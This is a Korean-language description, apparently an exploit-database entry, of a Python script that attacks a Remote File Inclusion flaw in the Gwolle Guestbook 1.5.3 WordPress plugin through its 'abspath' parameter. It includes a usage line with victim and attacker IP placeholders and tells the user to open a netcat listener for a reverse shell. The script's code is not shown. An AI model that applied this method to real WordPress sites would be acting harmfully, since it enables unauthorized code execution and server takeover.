
WordPress 플러그인 Gwolle Guestbook 1.5.3 - 원격 파일 포함
이 Python 스크립트는 Gwolle Guestbook WordPress 플러그인의 치명적인 Remote File Inclusion (RFI) 취약점을 악용하며, 인증되지 않은 공격자가 원격 PHP 파일을 포함하고 취약한 시스템에서 임의 코드를 실행할 수 있습니다.
HTTP GET 매개변수 "abspath"가 PHP require() 함수에서 사용되기 전에 적절히 정리되지 않습니다. 원격 공격자는 임의의 원격 서버에서 'wp-load.php'라는 파일을 포함하고 취약한 웹 서버에서 해당 내용을 실행할 수 있습니다. 이를 위해 공격자는 악성 'wp-load.php' 파일을 자신의 서버 문서 루트에 배치하고 요청에 서버의 URL을 포함해야 합니다.
이 취약점을 성공적으로 악용하면 전체 WordPress 설치가 손상될 수 있으며, 전체 웹 서버가 손상될 수도 있습니다.
스크립트는 세 가지 인수가 필요합니다:
예시:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT참고: 지정된 포트에서 공격자 머신에 netcat 리스너가 열려 있어야 합니다.
이 스크립트는 교육 목적으로만 제공됩니다. 저자는 이 스크립트의 오용으로 인한 모든 손해에 대해 책임을 지지 않습니다.